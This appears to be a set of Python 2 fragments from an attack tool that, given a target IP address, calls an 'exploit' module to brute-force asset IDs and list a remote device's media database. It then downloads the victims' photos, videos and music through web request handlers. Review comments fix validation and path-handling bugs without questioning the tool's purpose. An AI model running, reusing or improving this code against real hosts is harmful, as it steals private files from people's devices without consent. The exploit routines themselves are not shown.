def __init__(self):
    """Select today's log file and make sure the log directory exists.

    Sets ``self.filename`` to ``YYYY-MM-DD.txt`` for the current date and
    ``self.filepath`` to that name inside the translated ``self.logdir``.
    """
    today = datetime.now().strftime("%Y-%m-%d")
    self.filename = today + ".txt"

    log_root = helper.translate_path(self.logdir)
    directory_missing = not os.path.isdir(log_root)
    if directory_missing:
        try:
            helper.mkdir(log_root)
        except Exception:
            # Best effort: the failure is reported on stdout only, and
            # self.filepath is still set below even though the directory
            # may not exist.
            print('Unable to create log directory')

    self.filepath = os.path.join(log_root, self.filename)
def brute_media(target, mediatype='photo', id_from=0, id_to=2000, id_step=20, retry=0):
    """Request one window of asset ids for ``mediatype``, then recurse on the next window.

    The actual retrieval is delegated to ``exploit.brute_assets`` (defined
    elsewhere). After each window the function recurses while the next start id
    is below ``brute_id_max``, fewer thumbnails than the per-type limit have been
    collected, and ``exploit.is_reachable(target)`` is true.

    Returns the number of thumbnails reported by ``get_thumbs(mediatype)``.
    """
    relative_dir = 'tmp/data/{0}/{1}/media/{2}/thumbnail'.format(
        clean_target_network, clean_target_ip, mediatype)
    download_path = helper.translate_path(relative_dir)
    if not os.path.isdir(download_path):
        helper.mkdir(download_path)

    print('[*] Bruteforcing from {0} to {1}'.format(str(id_from), str(id_to)))
    data = exploit.brute_assets(target, download_path, mediatype, id_from, id_to, id_step)
    print(data)

    # NOTE(review): `retry` is accepted but never read in this body, and it is
    # not forwarded to the recursive call; the retry condition that used it
    # (len(data) > 0 or retry >= max_bruteforce_retries) is disabled.

    # The next window starts right after the current one and spans
    # (id_to - id_from), i.e. it ends at 2 * id_to - id_from.
    next_from = id_to + 1
    next_to = 2 * id_to - id_from

    found = len(get_thumbs(mediatype))
    if mediatype in files_max_download:
        limit = files_max_download[mediatype]
    else:
        limit = files_max_download['other']

    # Each further window adds one recursion level; depth is bounded only by
    # brute_id_max, the download limit and the reachability check.
    if next_from < brute_id_max and found < limit and exploit.is_reachable(target):
        brute_media(target, mediatype, next_from, next_to, id_step)
    return len(get_thumbs(mediatype))
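def download_media_from_db(target, mediatype='photo', file_format='thumbnail'):
    """Download the assets listed by ``exploit.list_media_from_db`` for one media type.

    Args:
        target: host identifier, passed unchanged to the ``exploit`` helpers.
        mediatype: media category used in the download path and the listing call.
        file_format: ``'thumbnail'`` requests assets by listing key; any other
            value requests them by each entry's ``'path'`` field as type ``'file'``.

    Returns:
        Whatever ``exploit.list_media_from_db`` returned (possibly ``None``).
    """
    relative_dir = 'tmp/data/{0}/{1}/media/{2}/{3}'.format(
        clean_target_network, clean_target_ip, mediatype, file_format)
    download_path = helper.translate_path(relative_dir)
    if not os.path.isdir(download_path):
        helper.mkdir(download_path)

    media_db_result = exploit.list_media_from_db(target, mediatype)

    # The result is used as a mapping below (.keys() / .itervalues()), so test
    # for "non-empty" instead of comparing the mapping with the integer 0,
    # which under Python 2 is true for every dict, including an empty one.
    if media_db_result:
        logger.info('MediaDB data: ' + json.dumps(media_db_result))
        try:
            if file_format == 'thumbnail':
                asset_ids = media_db_result.keys()
                requested_file_type = mediatype
            else:
                asset_ids = [entry['path'] for entry in media_db_result.itervalues()]
                requested_file_type = 'file'

            result = exploit.download_multi_assets(
                target, download_path, requested_file_type, asset_ids, file_format)
            if result is not None and len(result) > 0:
                # All three placeholders use str.format; the original mixed in a
                # '%s' that was never substituted, so the host was never logged.
                logger.success('Downloaded {0} {1}s from {2} mediadb'.format(
                    mediatype, file_format, target))
        except Exception as e:
            # Deliberate best effort: a failed download is printed and the
            # listing is still returned to the caller.
            print(e)
    return media_db_result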
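def brute_files(self, page, qs):
    """Handle a request to fetch a range of asset ids from one host.

    Reads ``album``, ``ip``, ``from``, ``to`` and ``step`` from the parsed query
    string ``qs``, validates ``ip`` and ``album``, delegates the retrieval to
    ``exploit.brute_assets`` and replies with a JSON document whose ``data``
    field is the number of items returned. Successful results are remembered per
    session so that an identical request is answered from the session instead of
    being repeated against the host.

    Args:
        page: unused in this body.
        qs: mapping of query parameter name to list of values.
    """
    def _int_param(name, default):
        # Absent or non-integer values silently fall back to the default.
        try:
            return int(qs[name][0]) if name in qs else default
        except Exception:
            return default

    response = RequestHandler.empty_response.copy()
    json_output = RequestHandler.json_output.copy()
    self.session['brute_success'] = (
        self.session['brute_success'] if 'brute_success' in self.session else {})

    allowed_types = ['photo', 'video', 'music']
    file_type = str(qs['album'][0]) if 'album' in qs else 'photo'
    file_format = 'thumbnail' if file_type in exploit.assets_with_thumbs else 'raw'
    ip = str(qs['ip'][0]) if 'ip' in qs else False

    # NOTE(review): the three numeric parameters are request-controlled and are
    # passed on without any range check (zero or negative step, from > to,
    # very large spans) — confirm exploit.brute_assets tolerates that.
    id_from = _int_param('from', 1)
    id_to = _int_param('to', 2000)
    id_step = _int_param('step', 20)

    if ip is False:
        json_output['status'] = 'error'
        json_output['msg'] = 'missing IP'
    # \Z instead of $: '$' also matches just before a trailing newline, which
    # would let "1.2.3.4\n" through and into the path and identifier below.
    # Octet values above 255 are still not rejected by this pattern.
    elif not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}\Z', ip):
        json_output['status'] = 'error'
        json_output['msg'] = 'Invalid IP'
    elif file_type not in allowed_types:
        json_output['status'] = 'error'
        json_output['msg'] = 'Unsupported album'
    else:
        data = []
        identifier = '%s_%s_%s_%s_%s' % (ip, file_type, str(id_from), str(id_to), str(id_step))
        if identifier not in self.session['brute_success']:
            path = '/tmp/%s/%s/%s' % (self.session_id, ip, file_type)
            path += '/thumbs' if file_format == 'thumbnail' else '/data'
            realpath = self.translate_path(path)
            try:
                if not os.path.isdir(realpath):
                    helper.mkdir(realpath)
            except Exception:
                # NOTE(review): the error is stored on `response`, not on
                # `json_output`, so it is not part of the JSON body built
                # below — confirm whether send_ok reads these keys.
                response['status'] = 'error'
                response['msg'] = 'Unable to create directory to save files, make sure we have sufficient permissions'
                realpath = None

            if realpath is not None:
                data = exploit.brute_assets(ip, realpath, file_type, id_from, id_to, id_step)
                if len(data) > 0:
                    # Remember the successful retrieval so an identical request
                    # is not sent to the same host again.
                    self.session['brute_success'][identifier] = len(data)
            json_output['data'] = len(data)
        else:
            json_output['data'] = self.session['brute_success'][identifier]

    response['headers'] = {
        'Content-Type': 'application/json; charset=utf-8'
    }
    response['content'] = json.dumps(json_output)
    self.send_ok(response)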
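def get_media_files(self, page, qs):
    """Handle a request to list, then download, one host's media of a given type.

    Reads ``album`` and ``ip`` from the parsed query string ``qs``, asks
    ``exploit.list_media_from_db`` for the listing, hands the listed ids or
    paths to ``exploit.download_multi_assets`` and replies with a JSON document
    whose ``data`` field holds ``{"found": ..., "downloaded": ...}``. Non-empty
    results are remembered per session so that an identical request is answered
    from the session instead of being repeated against the host.

    Args:
        page: unused in this body.
        qs: mapping of query parameter name to list of values.
    """
    response = RequestHandler.empty_response.copy()
    json_output = RequestHandler.json_output.copy()
    self.session['media_success'] = (
        self.session['media_success'] if 'media_success' in self.session else {})

    file_type = str(qs['album'][0]) if 'album' in qs else 'photo'
    file_format = 'thumbnail' if file_type in exploit.assets_with_thumbs else 'raw'
    ip = str(qs['ip'][0]) if 'ip' in qs else False

    if ip is False:
        json_output['status'] = 'error'
        json_output['msg'] = 'missing IP'
    # \Z instead of $: '$' also matches just before a trailing newline, which
    # would let "1.2.3.4\n" through and into the path and identifier below.
    # Octet values above 255 are still not rejected by this pattern.
    elif not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}\Z', ip):
        json_output['status'] = 'error'
        json_output['msg'] = 'Invalid IP'
    # The fixed allow-list ('photo', 'video', 'music') is disabled for this
    # handler, so `album` reaches the filesystem path below straight from the
    # request. Restrict it to a single plain name so it cannot carry path
    # separators or '..'; whether self.translate_path would neutralise those
    # is not visible from this method.
    elif not re.match(r'^[A-Za-z0-9_-]+\Z', file_type):
        json_output['status'] = 'error'
        json_output['msg'] = 'Unsupported album'
    else:
        data = {"found": 0, "downloaded": False}
        identifier = '%s_%s' % (ip, file_type)
        if identifier not in self.session['media_success']:
            path = '/tmp/%s/%s/%s' % (self.session_id, ip, file_type)
            path += '/thumbs' if file_format == 'thumbnail' else '/data'
            realpath = self.translate_path(path)
            try:
                if not os.path.isdir(realpath):
                    helper.mkdir(realpath)
            except Exception:
                # NOTE(review): the error is stored on `response`, not on
                # `json_output`, so it is not part of the JSON body built
                # below — confirm whether send_ok reads these keys.
                response['status'] = 'error'
                response['msg'] = 'Unable to create directory to save files, make sure we have sufficient permissions'
                realpath = None

            if realpath is not None:
                data['found'] = exploit.list_media_from_db(ip, file_type)
                if data['found'] is not None and len(data['found']) > 0:
                    self.session['media_success'][identifier] = data
                    try:
                        if file_format == 'thumbnail':
                            asset_ids = data['found'].keys()
                            requested_file_type = file_type
                        else:
                            asset_ids = [
                                entry['path'] for entry in data['found'].itervalues()
                            ]
                            requested_file_type = 'file'

                        result = exploit.download_multi_assets(
                            ip, realpath, requested_file_type, asset_ids, file_format)
                        if result is not None and len(result) > 0:
                            data['downloaded'] = True
                            # Remember the successful retrieval so an identical
                            # request is not sent to the same host again.
                            self.session['media_success'][identifier] = data
                    except Exception as e:
                        # Deliberate best effort: the failure is printed and the
                        # listing is still returned with downloaded=False.
                        print(e)
                # An empty or missing listing is intentionally not cached, so
                # the next identical request queries the host again.
            json_output['data'] = data
        else:
            json_output['data'] = self.session['media_success'][identifier]

    response['headers'] = {
        'Content-Type': 'application/json; charset=utf-8'
    }
    response['content'] = json.dumps(json_output)
    self.send_ok(response)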